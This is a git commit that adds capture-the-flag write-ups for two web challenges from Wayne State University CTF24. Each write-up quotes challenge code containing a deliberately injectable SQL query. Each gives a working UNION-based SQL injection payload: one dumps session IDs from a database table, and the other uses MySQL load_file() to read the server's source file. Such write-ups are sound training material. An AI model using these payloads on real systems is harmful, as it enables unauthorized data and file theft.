feat: added Wayne State University - CTF24

2024-04-14 09:42:11 +07:00 · 2024-04-14 09:42:11 +07:00 · 7ecc0a3c9f
parent 5fd19bd6a5
commit 7ecc0a3c9f
10 changed files with 144 additions and 0 deletions
--- a/2)/EatMoreCookiespt2.zip
+++ b/2)/EatMoreCookiespt2.zip
--- a/2)/README.md
+++ b/2)/README.md
@ -0,0 +1,84 @@
+# Eat More Cookies (Part 2)
+> `-`
+
+## About the Challenge
+We got a website and also the source code (You can download the source code [here](EatMoreCookiespt2.zip)). Here is the preview of the website
+
+![preview](images/preview.png)
+
+If we check the source code, especially this part:
+
+```js
+app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
+  cookies = req.query.cookies;
+
+  const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
+
+    pool.query(query, (err, result) => {
+      if(err){
+        return next(err)
+      }
+
+    return res.status(200).render("index", {cookies: result || []})
+    });
+})
+```
+
+The `cookies` parameter is vulnerable to SQL injection, and we can get the flag by accessing `/flag` endpoint
+
+```js
+app.get("/flag", isAdmin, (req, res, next) => {
+
+  return res.json({"flag": "WSUCTF{F4ke_Flag}"})
+})
+```
+
+But we need to login as administrator first:
+
+```js
+app.post("/adminLogin", async (req, res, next) => {
+  const { username, password } = req.body;
+  const query = 'SELECT * FROM users WHERE username = ? LIMIT 1';
+    try {
+    pool.query(query, [username], async (err, result) => {
+
+      user = result[0];
+
+      console.log(user);
+
+      if(!user){
+        return res.json({message: "User not found. Please try again."})
+      }
+
+      let comparePassword = await bcrypt.compare(password, user.password);
+
+      if(username == "Administrator" && comparePassword){
+        req.session.username = "Admin";
+        req.session.isAdmin = true;
+    
+        return res.json({"message": "Successfully logged in as adminstrator."})
+      } else if(comparePassword){
+        return res.json({"message": "You are logged in, but you aren't administrator. You could've used the regular login instead!"})
+      } else {
+        return res.json({"message": "Invalid username or password. Please try again."})
+      }
+    })
+  } catch (err) {
+    return next(err)
+  }
+
+})
+```
+
+## How to Solve?
+To solve this chall, im using unintended way. Im using `load_file()` MySQL function to read local file and then read `app.js` file
+
+```
+" union select 1,load_file('/app/src/app.js'),3-- -
+```
+
+![flag](images/flag.png)
+
+```
+WSUCTF{Sess1on_IDs_m4ch_more_v4lner9ble_th9n_I_TH0ught}
+```
--- a/2)/images/flag.png
+++ b/2)/images/flag.png
--- a/2)/images/preview.png
+++ b/2)/images/preview.png
--- a/Cookies/EatMoreCookies.zip
+++ b/Cookies/EatMoreCookies.zip
--- a/Cookies/README.md
+++ b/Cookies/README.md
@ -0,0 +1,51 @@
+# Eat More Cookies
+> `-`
+
+## About the Challenge
+We got a website and also the source code (You can download the source code [here](EatMoreCookies.zip)). Here is the preview of the website
+
+![preview](images/preview.png)
+
+If we check the source code, especially this part:
+
+```js
+app.get("/searchcookies", isAuthenticated, async (req, res, next) => {
+  cookies = req.query.cookies;
+
+  const query = `SELECT * FROM cookies WHERE flavor = "${cookies}"`;
+
+    pool.query(query, (err, result) => {
+      if(err){
+        return next(err)
+      }
+
+    return res.status(200).render("index", {cookies: result || []})
+    });
+})
+```
+
+The `cookies` paramter is vulnerable to SQL injection, and the flag is inside another table called `sessions`
+
+```js
+try {
+    const adminCookieData = {"cookie":{"originalMaxAge":86400000,"expires":"2024-04-20T19:21:29.400Z","httpOnly":true,"path":"/", "sameSite": "lax"},"username":"Admin","isAdmin":true};
+    const sessionId = 'WSUCTF{F4ke_Flag}';
+    const expirationTimestamp = 1712172179;
+
+    const serializedData = JSON.stringify(adminCookieData);
+
+    const query = `INSERT INTO sessions (session_id, data, expires) VALUES (?, ?, ?)`;
+```
+
+## How to Solve?
+To get every `session_id` inside `sessions` table, im using this payload:
+
+```
+" union select 1,(select group_concat(session_id) from sessions),3-- -
+```
+
+![flag](images/flag.png)
+
+```
+{WSUCTF24:S3arching_Thr0ugh_Very_Expr3ssive_DBz}
+```
--- a/Cookies/images/flag.png
+++ b/Cookies/images/flag.png
--- a/Cookies/images/preview.png
+++ b/Cookies/images/preview.png
--- a/CTF24/README.md
+++ b/CTF24/README.md
@ -0,0 +1,7 @@
+# Wayne State University - CTF24
+CTF writeup for The Wayne State University - CTF24. I took part in this CTF competition with the Heroes Cyber Security team and secured the 1st place out of 75 teams
+
+| Category | Challenge |
+| --- | --- |
+| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies/)
+| Web | [Blog](/2024/Wayne%20State%20University%20-%20CTF24/Eat%20More%20Cookies%20(Part%202)/)
--- a/README.md
+++ b/README.md
@ -11,6 +11,7 @@ There are __551__ CTF writeups that have been made in this repository

 | Event Name | Team | Ranking |
 | ---------- | ---- | ------- |
+| Wayne State University - CTF24 | 1 |
 | KnightCTF 2024 | Heroes Cyber Security | 1 |
 | DeconstruCT.F 2023 | aseng_fans_club | 1 |
 | The Odyssey CTF | aseng_fans_club | 1 |
@ -48,6 +49,7 @@ List of CTF events that i have joined before
 | 0xL4ugh CTF 2024 | Yes |[Link](/2024/0xL4ugh%20CTF%202024/) |
 | UNbreakable International 2024 - Team Phase | Yes |[Link](/2024/UNbreakable%20International%202024%20-%20Team%20Phase/) |
 | SwampCTF 2024 | Yes |[Link](/2024/SwampCTF%202024/) |
+| Wayne State University - CTF24 | Yes |[Link](/2024/Wayne%20State%20University%20-%20CTF24/) |

 ### Local Events
 | Event Name | Writeup Available? | Writeup Link |